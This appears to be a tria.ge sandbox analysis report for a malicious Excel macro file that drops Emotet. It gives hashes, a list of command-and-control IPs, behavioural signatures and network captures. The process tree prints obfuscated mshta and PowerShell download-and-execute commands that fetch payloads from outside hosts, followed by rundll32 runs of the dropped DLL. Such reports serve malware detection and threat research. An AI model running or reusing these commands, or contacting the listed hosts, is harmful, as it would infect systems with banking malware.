Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
152s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
19/01/2022, 23:54 UTC
Behavioral task
behavioral1
Sample
b9510c284bf2350a71ff66a248c97768d98b4e04146ade4a28fd9f1fab9137c3.xlsm
Resource
win10-en-20211208
General
-
Target
b9510c284bf2350a71ff66a248c97768d98b4e04146ade4a28fd9f1fab9137c3.xlsm
-
Size
115KB
-
MD5
ae463a7f0de640061802d78223d7424d
-
SHA1
d4809b8d5b09ede52d07f27485ed5d54bb7e4eca
-
SHA256
b9510c284bf2350a71ff66a248c97768d98b4e04146ade4a28fd9f1fab9137c3
-
SHA512
ea7ab3c0d5641711e0600dac4c1bf6bcd9035715b529360d7027a1e64ae963b958b8b70d890dc027487cf138b3eb92862cb69a9875f34216e64a8a1facee2758
Malware Config
Extracted
http://0x5cff39c3/sec/se1.html
Extracted
http://92.255.57.195/sec/se1.png
Extracted
emotet
Epoch5
45.138.98.34:80
69.16.218.101:8080
51.210.242.234:8080
185.148.168.220:8080
142.4.219.173:8080
54.38.242.185:443
191.252.103.16:80
104.131.62.48:8080
62.171.178.147:8080
217.182.143.207:443
168.197.250.14:80
37.44.244.177:8080
66.42.57.149:443
210.57.209.142:8080
159.69.237.188:443
116.124.128.206:8080
128.199.192.135:8080
195.154.146.35:443
185.148.168.15:8080
195.77.239.39:8080
207.148.81.119:8080
85.214.67.203:8080
190.90.233.66:443
78.46.73.125:443
78.47.204.80:443
37.59.209.141:8080
54.37.228.122:443
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2264 2464 cmd.exe 68 -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
flow pid Process 36 3664 mshta.exe 43 1328 powershell.exe 45 1328 powershell.exe 46 3032 rundll32.exe 47 3032 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
pid Process 2952 rundll32.exe 1756 rundll32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Xokaozvpqz\pvsqulbvuplvj.fnj rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2256 3664 WerFault.exe 75 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2464 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 1328 powershell.exe 1328 powershell.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 1328 powershell.exe 3032 rundll32.exe 3032 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 2256 WerFault.exe -
Suspicious use of SetWindowsHookEx 20 IoCs
pid Process 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE 2464 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 2464 wrote to memory of 2104 2464 EXCEL.EXE 72 PID 2464 wrote to memory of 2104 2464 EXCEL.EXE 72 PID 2464 wrote to memory of 2264 2464 EXCEL.EXE 73 PID 2464 wrote to memory of 2264 2464 EXCEL.EXE 73 PID 2264 wrote to memory of 3664 2264 cmd.exe 75 PID 2264 wrote to memory of 3664 2264 cmd.exe 75 PID 3664 wrote to memory of 1328 3664 mshta.exe 77 PID 3664 wrote to memory of 1328 3664 mshta.exe 77 PID 1328 wrote to memory of 3396 1328 powershell.exe 80 PID 1328 wrote to memory of 3396 1328 powershell.exe 80 PID 3396 wrote to memory of 2952 3396 cmd.exe 81 PID 3396 wrote to memory of 2952 3396 cmd.exe 81 PID 3396 wrote to memory of 2952 3396 cmd.exe 81 PID 2952 wrote to memory of 1756 2952 rundll32.exe 82 PID 2952 wrote to memory of 1756 2952 rundll32.exe 82 PID 2952 wrote to memory of 1756 2952 rundll32.exe 82 PID 1756 wrote to memory of 680 1756 rundll32.exe 83 PID 1756 wrote to memory of 680 1756 rundll32.exe 83 PID 1756 wrote to memory of 680 1756 rundll32.exe 83 PID 680 wrote to memory of 3032 680 rundll32.exe 84 PID 680 wrote to memory of 3032 680 rundll32.exe 84 PID 680 wrote to memory of 3032 680 rundll32.exe 84
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\b9510c284bf2350a71ff66a248c97768d98b4e04146ade4a28fd9f1fab9137c3.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2104
-
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\system32\mshta.exemshta http://0x5cff39c3/sec/se1.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xokaozvpqz\pvsqulbvuplvj.fnj",AIrvNFjwTIczp8⤵
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xokaozvpqz\pvsqulbvuplvj.fnj",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3032
-
-
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3664 -s 16364⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
-
Network
-
Remote address:92.255.57.195:80RequestGET /sec/se1.html HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 92.255.57.195
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Wed, 19 Jan 2022 18:29:09 GMT
ETag: "2adf-5d5f38fbf4740"
Accept-Ranges: bytes
Content-Length: 10975
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
-
Remote address:92.255.57.195:80RequestGET /sec/se1.png HTTP/1.1
Host: 92.255.57.195
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Wed, 19 Jan 2022 18:27:22 GMT
ETag: "430-5d5f3895e9680"
Accept-Ranges: bytes
Content-Length: 1072
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
-
Remote address:8.8.8.8:53Requestseven-lines.comIN AResponseseven-lines.comIN A178.208.83.22
-
Remote address:178.208.83.22:80RequestGET /wp-includes/QEGNF4XUSR2Ps/ HTTP/1.1
Host: seven-lines.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Wed, 19 Jan 2022 23:54:55 GMT
Content-Type: application/x-msdownload
Content-Length: 616448
Connection: keep-alive
Keep-Alive: timeout=5
X-Powered-By: PHP/5.6.37
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Wed, 19 Jan 2022 23:54:55 GMT
Content-Disposition: attachment; filename="YdL2KCVPV8.dll"
Content-Transfer-Encoding: binary
Set-Cookie: 61e8a4cf14e00=1642636495; expires=Wed, 19-Jan-2022 23:55:55 GMT; Max-Age=60; path=/
Last-Modified: Wed, 19 Jan 2022 23:54:55 GMT
-
Remote address:69.16.218.101:8080RequestGET /PtdzEgctxefTHbqGmgxSrBjIUuvZd HTTP/1.1
Cookie: cvPrOubDezBxMbD=FRqjaRBofmcFnxoj3abmLU5mJCGtPw5BCK2kLof4OKPkkASzOXIKB+UsN7MA1eyLETIutVYBCTPKm5i5RzGRkLhXHPyPF8pftEkS8mUvhCpfqLK7htjcdYUpr0aG2ODGBhJKL/TJ1eS+XhdYypOiuzXVsneB5YbfMxK8FWeyegCYly/dvcZx+g+yllzZaemmXArjIuWddfaoKpE2rTG/1qsAdr60N5KNgl+N9LInYTrtrJB2beE+qaXNqS+15mo0g14iB35/NwMxrETBgynDSsMljmNr6B32YiSDikoE
Host: 69.16.218.101:8080
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 19 Jan 2022 23:55:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
322 B 7
-
1.7kB 19.5kB 15 17
-
881 B 11.8kB 12 11
HTTP Request
GET http://92.255.57.195/sec/se1.htmlHTTP Response
200 -
626 B 1.6kB 12 4
HTTP Request
GET http://92.255.57.195/sec/se1.pngHTTP Response
200 -
10.3kB 634.0kB 223 426
HTTP Request
GET http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/HTTP Response
200 -
156 B 120 B 3 3
-
1.3kB 2.5kB 12 9
HTTP Request
GET https://69.16.218.101:8080/PtdzEgctxefTHbqGmgxSrBjIUuvZdHTTP Response
200